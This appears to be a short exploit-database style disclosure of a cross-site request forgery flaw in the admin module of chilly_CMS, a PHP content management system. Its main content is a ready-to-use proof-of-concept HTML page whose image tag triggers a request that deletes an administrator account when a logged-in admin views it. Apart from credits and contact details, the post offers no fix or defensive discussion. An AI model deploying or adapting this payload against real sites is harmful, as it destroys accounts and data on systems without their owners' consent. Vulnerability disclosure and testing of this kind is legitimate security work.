53 lines
No EOL
1.4 KiB
HTML
53 lines
No EOL
1.4 KiB
HTML
=======================================================================
|
|
|
|
chilly_CMS CSRF Vulnerability
|
|
|
|
=======================================================================
|
|
|
|
|
|
|
|
|
|
|
|
# Vulnerability found in- Admin module
|
|
|
|
# email Pratulag@yahoo.com
|
|
|
|
# company aksitservices
|
|
|
|
# Credit by Pratul Agrawal
|
|
|
|
# Software chilly_CMS
|
|
|
|
# Category CMS / Portals
|
|
|
|
# Plateform php
|
|
|
|
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
|
|
|
|
|
|
|
|
# Proof of concept #
|
|
|
|
|
|
Script to Delete the Admin user through Cross Site request forgery
|
|
|
|
. ................................................................................................................
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<img src=http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
. ..................................................................................................................
|
|
|
|
|
|
|
|
After execution refresh the page and u can see that a added content is deleted automatically.
|
|
|
|
|
|
#If you have any questions, comments, or concerns, feel free to contact me. |